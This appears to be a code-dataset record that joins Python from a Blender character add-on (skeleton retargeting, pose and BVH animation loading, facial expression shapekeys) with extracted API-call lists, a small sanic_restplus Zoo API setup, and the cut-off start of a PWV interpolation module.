return None
else:
logger.warning("Warning: Can't get the edit bone of %s because the mode is %s",
bpy.context.scene.objects.active, bpy.context.object.mode)
return None
def get_source_editbone(self, armat, b_name):
if bpy.context.object.mode == "EDIT":
b_name = self.get_mapped_name(b_name)
if b_name:
ebone = algorithms.get_edit_bone(armat, b_name)
if ebone:
return ebone
logger.warning("%s not found in edit mode of source armature %s", b_name, armat)
return None
else:
logger.warning("Warning: Can't get the edit bone of %s because the mode is %s",
bpy.context.scene.objects.active, bpy.context.object.mode)
return None
def get_mapped_name(self, b_name):
return self.skeleton_mapped.get(b_name)
def map_bone(self, armat, b_name, b_type, s_method):
mapped_name = self.find_bone(armat, b_type, s_method)
if mapped_name is not None:
self.skeleton_mapped[b_name] = mapped_name
def map_by_direct_parent(self, armat, childr_name, map_name):
childr_bone_name = self.get_mapped_name(childr_name)
if childr_bone_name:
parent_bone_name = self.bone_parent_name(armat, childr_bone_name)
if parent_bone_name:
if parent_bone_name not in self.already_mapped_bones:
self.skeleton_mapped[map_name] = parent_bone_name
self.already_mapped_bones.append(parent_bone_name)
return True
logger.warning("Error in mapping %s as direct parent of %s", map_name, childr_name)
return False
def map_main_bones(self, armat):
ending_bones = self.get_ending_bones(armat)
chains = self.get_bone_chains(armat, ending_bones)
self.identify_bone_chains(chains)
self.filter_chains_by_length(armat)
self.filter_chains_by_dotprod(armat)
for bone in (
("clavicle_L", "LCLAVICLE", "by_exact_name"),
("clavicle_R", "RCLAVICLE", "by_exact_name"),
("head", "HEAD", "by_exact_name"),
("lowerarm_R", "RFOREARM", "by_exact_name"),
("lowerarm_L", "LFOREARM", "by_exact_name"),
("upperarm_R", "RUPPERARM", "by_children"),
("upperarm_L", "LUPPERARM", "by_children"),
("hand_R", "RHAND", "by_exact_name"),
("hand_L", "LHAND", "by_exact_name"),
("breast_R", "RBREAST", "by_exact_name"),
("breast_L", "LBREAST", "by_exact_name"),
("calf_R", "RCALF", "by_exact_name"),
("calf_L", "LCALF", "by_exact_name"),
("foot_R", "RFOOT", "by_exact_name"),
("foot_L", "LFOOT", "by_exact_name"),
("toes_R", "RTOE", "by_exact_name"),
("toes_L", "LTOE", "by_exact_name"),
("pelvis", "PELVIS", "by_exact_name"),
("spine03", "CHEST", "by_chain_index"),
):
self.map_bone(armat, *bone)
if not self.map_by_direct_parent(armat, "head", "neck"):
self.map_bone(armat, "neck", "NECK", "by_similar_name") # TODO: integrate in find function
self.map_by_direct_parent(armat, "spine03", "spine02")
self.map_by_direct_parent(armat, "spine02", "spine01")
self.map_by_direct_parent(armat, "calf_R", "thigh_R")
self.map_by_direct_parent(armat, "calf_L", "thigh_L")
for bone in (
("thumb03_R", "RTHUMB03", "by_chain_index"),
("thumb02_R", "RTHUMB02", "by_chain_index"),
("thumb01_R", "RTHUMB01", "by_chain_index"),
("index03_R", "RINDEX03", "by_chain_index"),
("index02_R", "RINDEX02", "by_chain_index"),
("index01_R", "RINDEX01", "by_chain_index"),
("index00_R", "RINDEX00", "by_exact_name"),
("middle03_R", "RMIDDLE03", "by_chain_index"),
("middle02_R", "RMIDDLE02", "by_chain_index"),
("middle01_R", "RMIDDLE01", "by_chain_index"),
("middle00_R", "RMIDDLE00", "by_exact_name"),
("ring03_R", "RRING03", "by_chain_index"),
("ring02_R", "RRING02", "by_chain_index"),
("ring01_R", "RRING01", "by_chain_index"),
("ring00_R", "RRING00", "by_exact_name"),
("pinky03_R", "RPINKY03", "by_chain_index"),
("pinky02_R", "RPINKY02", "by_chain_index"),
("pinky01_R", "RPINKY01", "by_chain_index"),
("pinky00_R", "RPINKY00", "by_exact_name"),
("thumb03_L", "LTHUMB03", "by_chain_index"),
("thumb02_L", "LTHUMB02", "by_chain_index"),
("thumb01_L", "LTHUMB01", "by_chain_index"),
("index03_L", "LINDEX03", "by_chain_index"),
("index02_L", "LINDEX02", "by_chain_index"),
("index01_L", "LINDEX01", "by_chain_index"),
("index00_L", "LINDEX00", "by_exact_name"),
("middle03_L", "LMIDDLE03", "by_chain_index"),
("middle02_L", "LMIDDLE02", "by_chain_index"),
("middle01_L", "LMIDDLE01", "by_chain_index"),
("middle00_L", "LMIDDLE00", "by_exact_name"),
("ring03_L", "LRING03", "by_chain_index"),
("ring02_L", "LRING02", "by_chain_index"),
("ring01_L", "LRING01", "by_chain_index"),
("ring00_L", "LRING00", "by_exact_name"),
("pinky03_L", "LPINKY03", "by_chain_index"),
("pinky02_L", "LPINKY02", "by_chain_index"),
("pinky01_L", "LPINKY01", "by_chain_index"),
("pinky00_L", "LPINKY00", "by_exact_name"),
("upperarm_twist_R", "RUPPERARM_TWIST", "by_exact_name"),
("upperarm_twist_L", "LUPPERARM_TWIST", "by_exact_name"),
("lowerarm_twist_R", "RFOREARM_TWIST", "by_exact_name"),
("lowerarm_twist_L", "LFOREARM_TWIST", "by_exact_name"),
("thigh_twist_R", "RUPPERLEG_TWIST", "by_exact_name"),
("thigh_twist_L", "LUPPERLEG_TWIST", "by_exact_name"),
("thigh_calf_R", "RCALF_TWIST", "by_exact_name"),
("thigh_calf_L", "LCALF_TWIST", "by_exact_name"),
):
self.map_bone(armat, *bone)
def bake_animation(self, target_armat, source_armat):
f_range = [0, bpy.context.scene.frame_current]
algorithms.select_and_change_mode(target_armat, 'POSE')
if source_armat.animation_data:
source_action = source_armat.animation_data.action
f_range = source_action.frame_range
bpy.ops.nla.bake(frame_start=f_range[0], frame_end=f_range[1], only_selected=False,
visual_keying=True, clear_constraints=False, use_current_action=True, bake_types={'POSE'})
self.remove_armature_constraints(target_armat)
@staticmethod
def reset_bones_rotations(armat):
for p_bone in armat.pose.bones:
if p_bone.rotation_mode == 'QUATERNION':
reset_val = mathutils.Quaternion((1.0, 0.0, 0.0, 0.0))
p_bone.rotation_quaternion = reset_val
elif p_bone.rotation_mode == 'AXIS_ANGLE':
reset_val = mathutils.Vector((0.0, 0.0, 1.0, 0.0))
p_bone.rotation_axis_angle = reset_val
else:
reset_val = mathutils.Euler((0.0, 0.0, 0.0))
p_bone.rotation_euler = reset_val
# TODO skeleton structure check
def calculate_skeleton_vectors(self, armat, armat_type, rot_type):
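        # Two reference vectors characterise a skeleton's orientation: the
        # spine axis (pelvis head to head bone) and the shoulder axis (right
        # hand to left hand), with the neck and forearms as fallbacks when a
        # bone is missing.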
algorithms.select_and_change_mode(armat, "EDIT")
if armat_type == 'SOURCE':
head_bone = self.get_source_editbone(armat, "head")
pelvis_bone = self.get_source_editbone(armat, "pelvis")
hand_bone1 = self.get_source_editbone(armat, "hand_R")
hand_bone2 = self.get_source_editbone(armat, "hand_L")
if not head_bone:
head_bone = self.get_source_editbone(armat, "neck")
if not hand_bone1:
hand_bone1 = self.get_source_editbone(armat, "lowerarm_R")
if not hand_bone2:
hand_bone2 = self.get_source_editbone(armat, "lowerarm_L")
elif armat_type == 'TARGET':
head_bone = self.get_target_editbone(armat, "head")
pelvis_bone = self.get_target_editbone(armat, "pelvis")
hand_bone1 = self.get_target_editbone(armat, "hand_R")
hand_bone2 = self.get_target_editbone(armat, "hand_L")
if not head_bone:
head_bone = self.get_target_editbone(armat, "neck")
if not hand_bone1:
hand_bone1 = self.get_target_editbone(armat, "lowerarm_R")
if not hand_bone2:
hand_bone2 = self.get_target_editbone(armat, "lowerarm_L")
if head_bone and pelvis_bone and hand_bone1 and hand_bone2:
vect1 = head_bone.head - pelvis_bone.head
vect2 = hand_bone2.head - hand_bone1.head
algorithms.select_and_change_mode(armat, "POSE")
if rot_type == "ALIGN_SPINE":
return vect1.normalized()
if rot_type == "ALIGN_SHOULDERS":
return vect2.normalized()
else:
algorithms.select_and_change_mode(armat, "POSE")
return None
@staticmethod
def define_angle_direction(vect1, vect2, rot_axis, angle):
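        # Rotations of +angle and -angle about rot_axis are both candidates;
        # keep the one whose rotated copy of vect1 points the same way as
        # vect2 (larger non-negative dot product), else return the identity.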
angle1 = mathutils.Quaternion(rot_axis, angle)
angle2 = mathutils.Quaternion(rot_axis, -angle)
v_rot1 = vect1.copy()
v_rot2 = vect1.copy()
v_rot1.rotate(angle1)
v_rot2.rotate(angle2)
v_dot1 = v_rot1.dot(vect2)
v_dot2 = v_rot2.dot(vect2)
if v_dot1 >= 0 and v_dot1 >= v_dot2:
return angle1
if v_dot2 >= 0 and v_dot2 >= v_dot1:
return angle2
return mathutils.Quaternion((0.0, 0.0, 1.0), 0)
def align_skeleton(self, target_armat, source_armat):
self.calculate_skeleton_rotations(target_armat, source_armat, "ALIGN_SPINE")
self.calculate_skeleton_rotations(target_armat, source_armat, "ALIGN_SHOULDERS")
def calculate_skeleton_rotations(self, target_armat, source_armat, rot_type):
algorithms.apply_object_transformation(source_armat)
source_vectors = self.calculate_skeleton_vectors(source_armat, 'SOURCE', rot_type)
if source_vectors:
target_vectors = self.calculate_skeleton_vectors(target_armat, 'TARGET', rot_type)
if rot_type == "ALIGN_SHOULDERS":
source_vectors.z = 0.0
if target_vectors:
angle = source_vectors.angle(target_vectors)
rot_axis = source_vectors.cross(target_vectors)
rot = self.define_angle_direction(source_vectors, target_vectors, rot_axis, angle)
self.rotate_skeleton(source_armat, rot)
algorithms.apply_object_transformation(source_armat)
else:
logger.warning("Cannot calculate the target vector for armature alignment")
else:
logger.warning("Cannot calculate the source vector for armature alignment")
@staticmethod
def rotate_skeleton(armat, rot_quat):
armat.rotation_mode = 'QUATERNION'
armat.rotation_quaternion = rot_quat
bpy.context.view_layer.update()
def use_animation_pelvis(self, target_armat, source_armat):
if target_armat and source_armat:
v1 = None
v2 = None
armat_prop = self.get_armature_proportion(target_armat, source_armat)
algorithms.select_and_change_mode(source_armat, 'EDIT')
source_pelvis = self.get_source_editbone(source_armat, "pelvis")
r_thigh_bone = self.get_source_editbone(source_armat, "thigh_R")
l_thigh_bone = self.get_source_editbone(source_armat, "thigh_L")
if source_pelvis and r_thigh_bone and l_thigh_bone:
p1 = (r_thigh_bone.head + l_thigh_bone.head) * 0.5
p2 = source_pelvis.head
p3 = source_pelvis.tail
v1 = armat_prop * (p2 - p1)
v2 = armat_prop * (p3 - p2)
algorithms.select_and_change_mode(source_armat, 'POSE')
if v1 and v2:
algorithms.select_and_change_mode(target_armat, 'EDIT')
target_pelvis = self.get_target_editbone(target_armat, "pelvis")
r_thigh_bone = self.get_target_editbone(target_armat, "thigh_R")
l_thigh_bone = self.get_target_editbone(target_armat, "thigh_L")
if target_pelvis and r_thigh_bone and l_thigh_bone:
p1a = (r_thigh_bone.head + l_thigh_bone.head) * 0.5
target_pelvis.head = p1a + v1
target_pelvis.tail = target_pelvis.head + v2
algorithms.select_and_change_mode(target_armat, 'POSE')
def armature_height(self, armat, armat_type):
if not armat:
logger.warning("Cannot found the source armature for height calculation")
return 0
algorithms.set_object_visible(armat)
algorithms.select_and_change_mode(armat, 'EDIT')
upper_point = None
lower_point = None
if armat_type == 'SOURCE':
r_foot_bone = self.get_source_editbone(armat, "foot_R")
l_foot_bone = self.get_source_editbone(armat, "foot_L")
r_calf_bone = self.get_source_editbone(armat, "calf_R")
l_calf_bone = self.get_source_editbone(armat, "calf_L")
r_clavicle_bone = self.get_source_editbone(armat, "clavicle_R")
l_clavicle_bone = self.get_source_editbone(armat, "clavicle_L")
r_upperarm_bone = self.get_source_editbone(armat, "upperarm_R")
l_upperarm_bone = self.get_source_editbone(armat, "upperarm_L")
elif armat_type == 'TARGET':
r_foot_bone = self.get_target_editbone(armat, "foot_R")
l_foot_bone = self.get_target_editbone(armat, "foot_L")
r_calf_bone = self.get_target_editbone(armat, "calf_R")
l_calf_bone = self.get_target_editbone(armat, "calf_L")
r_clavicle_bone = self.get_target_editbone(armat, "clavicle_R")
l_clavicle_bone = self.get_target_editbone(armat, "clavicle_L")
r_upperarm_bone = self.get_target_editbone(armat, "upperarm_R")
l_upperarm_bone = self.get_target_editbone(armat, "upperarm_L")
if l_clavicle_bone and r_clavicle_bone:
upper_point = (l_clavicle_bone.head + r_clavicle_bone.head) * 0.5
elif l_upperarm_bone and r_upperarm_bone:
upper_point = (l_upperarm_bone.tail + r_upperarm_bone.tail) * 0.5
else:
logger.warning("Cannot calculate armature height: clavicles not found")
if l_foot_bone and r_foot_bone:
lower_point = (l_foot_bone.head + r_foot_bone.head)*0.5
elif l_calf_bone and r_calf_bone:
lower_point = (l_calf_bone.head + r_calf_bone.head)*0.5
else:
logger.warning("Cannot calculate armature height: feet not found")
if upper_point and lower_point:
height = upper_point-lower_point
algorithms.select_and_change_mode(armat, 'POSE')
return height.length
return 0
@staticmethod
def remove_armature_constraints(target_armature):
for b in target_armature.pose.bones:
if b.constraints:
                for cstr in list(b.constraints):  # copy: constraints are removed inside
if "mbastlab_" in cstr.name:
b.constraints.remove(cstr)
def add_copy_rotations(self, target_armat, source_armat, bones_to_rotate, space='WORLD'):
for b in target_armat.pose.bones:
if b.name in self.skeleton_mapped and b.name in bones_to_rotate:
if self.skeleton_mapped[b.name] and "mbastlab_rot" not in b.constraints:
cstr = b.constraints.new('COPY_ROTATION')
cstr.target = source_armat
cstr.subtarget = self.skeleton_mapped[b.name]
cstr.target_space = space
cstr.owner_space = space
cstr.name = "mbastlab_rot"
def add_copy_location(self, target_armat, source_armat, bones_to_move):
for b in target_armat.pose.bones:
if b.name in self.skeleton_mapped and b.name in bones_to_move:
if "mbastlab_loc" not in b.constraints:
cstr = b.constraints.new('COPY_LOCATION')
cstr.target = source_armat
cstr.subtarget = self.skeleton_mapped[b.name]
cstr.target_space = "WORLD"
cstr.owner_space = "WORLD"
cstr.name = "mbastlab_loc"
def add_armature_constraints(self, target_armat, source_armat):
bones_to_rotate = []
for b in target_armat.pose.bones:
if b.name not in self.local_rotation_bones:
bones_to_rotate.append(b.name)
self.add_copy_rotations(target_armat, source_armat, bones_to_rotate)
self.add_copy_rotations(target_armat, source_armat, self.local_rotation_bones, 'LOCAL')
self.add_copy_location(target_armat, source_armat, ["pelvis"])
def scale_armat(self, target_armat, source_armat):
scale = self.get_armature_proportion(target_armat, source_armat)
source_armat.scale = [scale, scale, scale]
@staticmethod
def clear_animation(armat):
if armat:
armat.animation_data_clear()
def get_armature_proportion(self, target_armat, source_armat):
t_height = self.armature_height(target_armat, 'TARGET')
s_height = self.armature_height(source_armat, 'SOURCE')
if s_height != 0:
armat_prop = t_height/s_height
else:
armat_prop = 1
return armat_prop
def reset_pose(self, armat=None, reset_location=True):
if not armat:
armat = get_active_armature()
if armat:
self.clear_animation(armat)
algorithms.stop_animation()
for p_bone in armat.pose.bones:
algorithms.reset_bone_rot(p_bone)
if reset_location:
if p_bone.name == "pelvis":
p_bone.location = [0, 0, 0]
def load_bones_quaternions(self, armat, data_path):
self.reset_pose(armat)
if armat:
matrix_data = algorithms.load_json_data(data_path, "Pose data")
algorithms.set_object_visible(armat)
algorithms.select_and_change_mode(armat, "POSE")
pose_bones = algorithms.get_pose_bones(armat)
for p_bone in pose_bones:
if p_bone.name in matrix_data:
algorithms.set_bone_rotation(p_bone, mathutils.Quaternion(matrix_data[p_bone.name]))
else:
algorithms.reset_bone_rot(p_bone)
@staticmethod
def save_pose(armat, filepath):
if not armat:
            logger.warning("Could not save pose: no armature given")
return
algorithms.select_and_change_mode(armat, "POSE")
matrix_data = {}
algorithms.set_object_visible(armat)
pose_bones = algorithms.get_pose_bones(armat)
for p_bone in pose_bones:
if "muscle" not in p_bone.name and "IK_" not in p_bone.name:
matrix_data[p_bone.name] = [value for value in algorithms.get_bone_rotation(p_bone)]
with open(filepath, 'w') as fp:
json.dump(matrix_data, fp)
def load_pose(self, filepath, target_armature=None, use_retarget=False):
if not target_armature:
target_armature = get_active_armature()
if not target_armature:
return False
self.reset_bones_correction()
self.reset_pose(target_armature)
if use_retarget:
source_armature = algorithms.import_object_from_lib(
self.lib_filepath, "MBLab_skeleton_base_fk", "temporary_armature")
if source_armature:
self.load_bones_quaternions(source_armature, filepath)
self.retarget(target_armature, source_armature, bake_animation=True)
algorithms.remove_object(source_armature)
algorithms.stop_animation()
else:
self.load_bones_quaternions(target_armature, filepath)
self.clear_animation(target_armature)
return True
def load_animation(self, bvh_path, debug_mode=False):
time1 = time.time()
target_armature = get_active_armature()
if not target_armature:
return
self.reset_bones_correction()
if target_armature:
existing_obj_names = algorithms.collect_existing_objects()
self.load_bvh(bvh_path)
source_armature = algorithms.get_newest_object(existing_obj_names)
if source_armature:
if not debug_mode:
self.retarget(target_armature, source_armature, True)
algorithms.remove_object(source_armature)
else:
self.retarget(target_armature, source_armature, False)
algorithms.play_animation()
logger.info("Animation loaded in %s sec.", time.time()-time1)
@staticmethod
def load_bvh(bvh_path):
bpy.context.scene.frame_end = 0
try:
bpy.ops.import_anim.bvh(
filepath=bvh_path,
use_fps_scale=True,
update_scene_duration=True
)
        except (FileNotFoundError, IOError):
            logger.warning("Can't import animation: bvh file not found or unreadable.")
def retarget(self, target_armature, source_armature, bake_animation=True):
logger.info("retarget with %s", source_armature.name)
if source_armature and target_armature:
self.init_skeleton_map(source_armature)
self.clear_animation(target_armature)
self.align_skeleton(target_armature, source_armature)
self.scale_armat(target_armature, source_armature)
self.reset_bones_rotations(target_armature)
self.use_animation_pelvis(target_armature, source_armature)
self.align_bones_z_axis(target_armature, source_armature)
self.remove_armature_constraints(target_armature)
self.add_armature_constraints(target_armature, source_armature)
if bake_animation:
scene_modifiers_status = algorithms.get_scene_modifiers_status()
algorithms.set_scene_modifiers_status(False)
algorithms.set_scene_modifiers_status_by_type('ARMATURE', True)
self.bake_animation(target_armature, source_armature)
algorithms.set_scene_modifiers_status(False, scene_modifiers_status)
class ExpressionEngineShapeK:
def __init__(self):
self.has_data = False
self.data_path = algorithms.get_data_path()
self.human_expression_path = os.path.join(
self.data_path,
"expressions_comb",
"human_expressions")
self.anime_expression_path = os.path.join(
self.data_path,
"expressions_comb",
"anime_expressions")
self.expressions_labels = set()
self.human_expressions_data = self.load_expression_database(self.human_expression_path)
self.anime_expressions_data = self.load_expression_database(self.anime_expression_path)
self.expressions_data = {}
self.model_type = "NONE"
self.has_data = True
def identify_model_type(self):
self.model_type = "NONE"
obj = algorithms.get_active_body()
if obj:
            current_shapekeys_names = algorithms.get_shapekeys_names(obj)
            if current_shapekeys_names:
                if "Expressions_IDHumans_max" in current_shapekeys_names:
                    self.model_type = "HUMAN"
                    return
                if "Expressions_IDAnime_max" in current_shapekeys_names:
self.model_type = "ANIME"
return
@staticmethod
def load_expression(filepath):
charac_data = algorithms.load_json_data(filepath, "Character data")
expressions_id = algorithms.simple_path(filepath)
if "manuellab_vers" in charac_data:
if not algorithms.check_version(charac_data["manuellab_vers"]):
logger.info("%s created with vers. %s.",
expressions_id, charac_data["manuellab_vers"])
else:
logger.info("No lab version specified in %s", expressions_id)
if "structural" in charac_data:
char_data = charac_data["structural"]
else:
logger.warning("No structural data in %s", expressions_id)
char_data = None
return char_data
def load_expression_database(self, dirpath):
expressions_data = {}
if algorithms.exists_database(dirpath):
for expression_filename in os.listdir(dirpath):
expression_filepath = os.path.join(dirpath, expression_filename)
e_item, extension = os.path.splitext(expression_filename)
if "json" in extension:
self.expressions_labels.add(e_item)
expressions_data[e_item] = self.load_expression(expression_filepath)
return expressions_data
def sync_expression_to_gui(self):
        # Process all expressions: reset them all, then update them all
        # according to the GUI values. TODO: optimize.
obj = algorithms.get_active_body()
for expression_name in self.expressions_data:
# Perhaps these two lines are not required
if not hasattr(obj, expression_name):
setattr(obj, expression_name, 0.0)
if hasattr(obj, expression_name):
self.reset_expression(expression_name)
for expression_name in sorted(self.expressions_data.keys()):
if hasattr(obj, expression_name):
express_val = getattr(obj, expression_name)
if express_val != 0:
self.update_expression(expression_name, express_val)
def reset_expressions_gui(self):
obj = algorithms.get_active_body()
for expression_name in self.expressions_data:
if hasattr(obj, expression_name):
setattr(obj, expression_name, 0.0)
self.reset_expression(expression_name)
def update_expressions_data(self):
self.identify_model_type()
if self.model_type == "ANIME":
self.expressions_data = self.anime_expressions_data
if self.model_type == "HUMAN":
self.expressions_data = self.human_expressions_data
if self.model_type == "NONE":
self.expressions_data = {}
def update_expression(self, expression_name, express_val):
obj = algorithms.get_active_body()
if not obj:
return
if not obj.data.shape_keys:
return
if expression_name in self.expressions_data:
expr_data = self.expressions_data[expression_name]
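            # Each expression stores morph values in [0, 1] around a neutral
            # 0.5: values below 0.5 drive the "<name>_min" shapekey and values
            # above drive "<name>_max", each rescaled back to [0, 1].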
for name, value in expr_data.items():
sk_value = 0
if value < 0.5:
name = f"{name}_min"
sk_value = (0.5 - value) * 2
else:
name = f"{name}_max"
sk_value = (value - 0.5) * 2
sk_value = sk_value*express_val
if sk_value != 0 and hasattr(obj.data.shape_keys, 'key_blocks'):
if name in obj.data.shape_keys.key_blocks:
current_val = obj.data.shape_keys.key_blocks[name].value
obj.data.shape_keys.key_blocks[name].value = min(current_val + sk_value, 1.0)
else:
logger.warning("Expression %s: shapekey %s not found", expression_name, name)
def reset_expression(self, expression_name):
obj = algorithms.get_active_body()
if not obj:
return
if not obj.data.shape_keys:
return
if expression_name in self.expressions_data:
expr_data = self.expressions_data[expression_name]
for name, value in expr_data.items():
name = f"{name}_min" if value < 0.5 else f"{name}_max"
if hasattr(obj.data.shape_keys, 'key_blocks'):
if name in obj.data.shape_keys.key_blocks:
obj.data.shape_keys.key_blocks[name].value = 0
@staticmethod
def keyframe_expression():
obj = algorithms.get_active_body()
if not obj:
return
if not obj.data.shape_keys:
return
if hasattr(obj.data.shape_keys, 'key_blocks'):
for sk in obj.data.shape_keys.key_blocks:
if "Expressions_" in sk.name:
sk.keyframe_insert(data_path="value")
|
[
"json.dump",
"bpy.ops.import_anim.bvh",
"os.path.isdir",
"mathutils.Quaternion",
"bpy.ops.nla.bake",
"bpy.context.view_layer.update",
"time.time",
"os.path.isfile",
"mathutils.Vector",
"mathutils.Euler",
"os.path.splitext",
"functools.lru_cache",
"os.path.join",
"os.listdir",
"logging.getLogger"
] |
[((1309, 1336), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1326, 1336), False, 'import logging\n'), ((14611, 14631), 'functools.lru_cache', 'lru_cache', ([], {'maxsize': '(2)'}), '(maxsize=2)\n', (14620, 14631), False, 'from functools import lru_cache\n'), ((1574, 1641), 'os.path.join', 'os.path.join', (['self.data_path', 'self.data_path', '"""poses"""', '"""male_poses"""'], {}), "(self.data_path, self.data_path, 'poses', 'male_poses')\n", (1586, 1641), False, 'import os\n'), ((1674, 1743), 'os.path.join', 'os.path.join', (['self.data_path', 'self.data_path', '"""poses"""', '"""female_poses"""'], {}), "(self.data_path, self.data_path, 'poses', 'female_poses')\n", (1686, 1743), False, 'import os\n'), ((1755, 1789), 'os.path.isdir', 'os.path.isdir', (['self.maleposes_path'], {}), '(self.maleposes_path)\n', (1768, 1789), False, 'import os\n'), ((1842, 1878), 'os.path.isdir', 'os.path.isdir', (['self.femaleposes_path'], {}), '(self.femaleposes_path)\n', (1855, 1878), False, 'import os\n'), ((2110, 2165), 'os.path.join', 'os.path.join', (['self.data_path', '"""retarget_knowledge.json"""'], {}), "(self.data_path, 'retarget_knowledge.json')\n", (2122, 2165), False, 'import os\n'), ((45001, 45183), 'bpy.ops.nla.bake', 'bpy.ops.nla.bake', ([], {'frame_start': 'f_range[0]', 'frame_end': 'f_range[1]', 'only_selected': '(False)', 'visual_keying': '(True)', 'clear_constraints': '(False)', 'use_current_action': '(True)', 'bake_types': "{'POSE'}"}), "(frame_start=f_range[0], frame_end=f_range[1],\n only_selected=False, visual_keying=True, clear_constraints=False,\n use_current_action=True, bake_types={'POSE'})\n", (45017, 45183), False, 'import bpy\n'), ((45333, 45375), 'mathutils.Quaternion', 'mathutils.Quaternion', (['(1.0, 0.0, 0.0, 0.0)'], {}), '((1.0, 0.0, 0.0, 0.0))\n', (45353, 45375), False, 'import mathutils\n'), ((47904, 47941), 'mathutils.Quaternion', 'mathutils.Quaternion', (['rot_axis', 'angle'], {}), '(rot_axis, angle)\n', (47924, 47941), False, 'import mathutils\n'), ((47959, 47997), 'mathutils.Quaternion', 'mathutils.Quaternion', (['rot_axis', '(-angle)'], {}), '(rot_axis, -angle)\n', (47979, 47997), False, 'import mathutils\n'), ((48351, 48391), 'mathutils.Quaternion', 'mathutils.Quaternion', (['(0.0, 0.0, 1.0)', '(0)'], {}), '((0.0, 0.0, 1.0), 0)\n', (48371, 48391), False, 'import mathutils\n'), ((49817, 49848), 'bpy.context.view_layer.update', 'bpy.context.view_layer.update', ([], {}), '()\n', (49846, 49848), False, 'import bpy\n'), ((59103, 59114), 'time.time', 'time.time', ([], {}), '()\n', (59112, 59114), False, 'import time\n'), ((61620, 61689), 'os.path.join', 'os.path.join', (['self.data_path', '"""expressions_comb"""', '"""human_expressions"""'], {}), "(self.data_path, 'expressions_comb', 'human_expressions')\n", (61632, 61689), False, 'import os\n'), ((61765, 61834), 'os.path.join', 'os.path.join', (['self.data_path', '"""expressions_comb"""', '"""anime_expressions"""'], {}), "(self.data_path, 'expressions_comb', 'anime_expressions')\n", (61777, 61834), False, 'import os\n'), ((2178, 2211), 'os.path.isfile', 'os.path.isfile', (['self.lib_filepath'], {}), '(self.lib_filepath)\n', (2192, 2211), False, 'import os\n'), ((2216, 2251), 'os.path.isfile', 'os.path.isfile', (['self.knowledge_path'], {}), '(self.knowledge_path)\n', (2230, 2251), False, 'import os\n'), ((58090, 58116), 'json.dump', 'json.dump', (['matrix_data', 'fp'], {}), '(matrix_data, fp)\n', (58099, 58116), False, 'import json\n'), ((59993, 60087), 'bpy.ops.import_anim.bvh', 
'bpy.ops.import_anim.bvh', ([], {'filepath': 'bvh_path', 'use_fps_scale': '(True)', 'update_scene_duration': '(True)'}), '(filepath=bvh_path, use_fps_scale=True,\n update_scene_duration=True)\n', (60016, 60087), False, 'import bpy\n'), ((63662, 63681), 'os.listdir', 'os.listdir', (['dirpath'], {}), '(dirpath)\n', (63672, 63681), False, 'import os\n'), ((45497, 45539), 'mathutils.Quaternion', 'mathutils.Quaternion', (['(1.0, 0.0, 0.0, 0.0)'], {}), '((1.0, 0.0, 0.0, 0.0))\n', (45517, 45539), False, 'import mathutils\n'), ((59861, 59872), 'time.time', 'time.time', ([], {}), '()\n', (59870, 59872), False, 'import time\n'), ((63721, 63763), 'os.path.join', 'os.path.join', (['dirpath', 'expression_filename'], {}), '(dirpath, expression_filename)\n', (63733, 63763), False, 'import os\n'), ((63800, 63837), 'os.path.splitext', 'os.path.splitext', (['expression_filename'], {}), '(expression_filename)\n', (63816, 63837), False, 'import os\n'), ((45678, 45716), 'mathutils.Vector', 'mathutils.Vector', (['(0.0, 0.0, 1.0, 0.0)'], {}), '((0.0, 0.0, 1.0, 0.0))\n', (45694, 45716), False, 'import mathutils\n'), ((45818, 45850), 'mathutils.Euler', 'mathutils.Euler', (['(0.0, 0.0, 0.0)'], {}), '((0.0, 0.0, 0.0))\n', (45833, 45850), False, 'import mathutils\n'), ((57377, 57423), 'mathutils.Quaternion', 'mathutils.Quaternion', (['matrix_data[p_bone.name]'], {}), '(matrix_data[p_bone.name])\n', (57397, 57423), False, 'import mathutils\n')]
|
from sanic_restplus import Api
from .cat import api as cat_api
from .dog import api as dog_api
api = Api(
title='Zoo API',
version='1.0',
description='A simple demo API',
additional_css="/static/testme.css"
)
api.add_namespace(cat_api)
api.add_namespace(dog_api)
|
[
"sanic_restplus.Api"
] |
[((103, 212), 'sanic_restplus.Api', 'Api', ([], {'title': '"""Zoo API"""', 'version': '"""1.0"""', 'description': '"""A simple demo API"""', 'additional_css': '"""/static/testme.css"""'}), "(title='Zoo API', version='1.0', description='A simple demo API',\n additional_css='/static/testme.css')\n", (106, 212), False, 'from sanic_restplus import Api\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 18 10:12:42 2020
@author: shlomi
"""
from PW_paths import work_yuval
ims_path = work_yuval / 'IMS_T'
gis_path = work_yuval / 'gis'
awd_path = work_yuval / 'AW3D30'
def interpolate_var_ds_at_multiple_dts(var_ds, geo_var_df, predict_df,
time_dim='time', dem_path=awd_path,
H_constant=None):
import pandas as pd
times_df = var_ds[time_dim].to_pandas()
    dfs = []
for dt in times_df:
print('interpolating on datetime: {}.'.format(dt))
hdf = slice_var_ds_at_dt_and_convert_to_dataframe(var_ds, geo_var_df,
dt=dt.strftime('%Y-%m-%dT%H:%M:%S'))
# if H is None:
# # estimate scale height H by using all stations' data:
if H_constant is not None:
H = H_constant
else:
H = get_var_lapse_rate(hdf, model='LR', plot=False)
print('scale height is: {} meters.'.format(H))
new_hdf = apply_lapse_rate_change(hdf, H)
df_inter = interpolate_at_one_dt(new_hdf, H, predict_df=predict_df,
dem_path=dem_path, ppd=50)
df_inter['datetime'] = dt
df_inter['H'] = H
        dfs.append(df_inter)
    df = pd.concat(dfs)
    df['name'] = df.index
    df['datetime'] = pd.to_datetime(df['datetime'])
df.set_index('datetime', inplace=True)
df.index.name = 'time'
return df
def slice_var_ds_at_dt_and_convert_to_dataframe(var_ds, df, dt='2018-04-15T22:00:00'):
"""
slice the var dataset (PWV) with specific datetime and add lat, lon and alt from df
Parameters
----------
var_ds : Xarray Dataset
containing variable such as PWV vs. time.
df : Pandas DataFrame
containing lat, lon and alt cols, indexed by var_ds data_vars.
dt : datetime string, optional
DESCRIPTION. The default is '2018-04-15T22:00:00'.
Returns
-------
hdf : pandas dataframe
sliced var indexed by alt.
"""
time_dim = list(set(var_ds.dims))[0]
var_dt = var_ds.sel({time_dim: dt}).expand_dims(time_dim)
hdf = var_dt.to_dataframe().T
hdf = hdf.join(df[['lat', 'lon', 'alt']])
hdf = hdf.set_index('alt')
hdf = hdf.sort_index().dropna()
return hdf
def get_pressure_lapse_rate(path=ims_path, model='LR', plot=False):
from aux_gps import linear_fit_using_scipy_da_ts
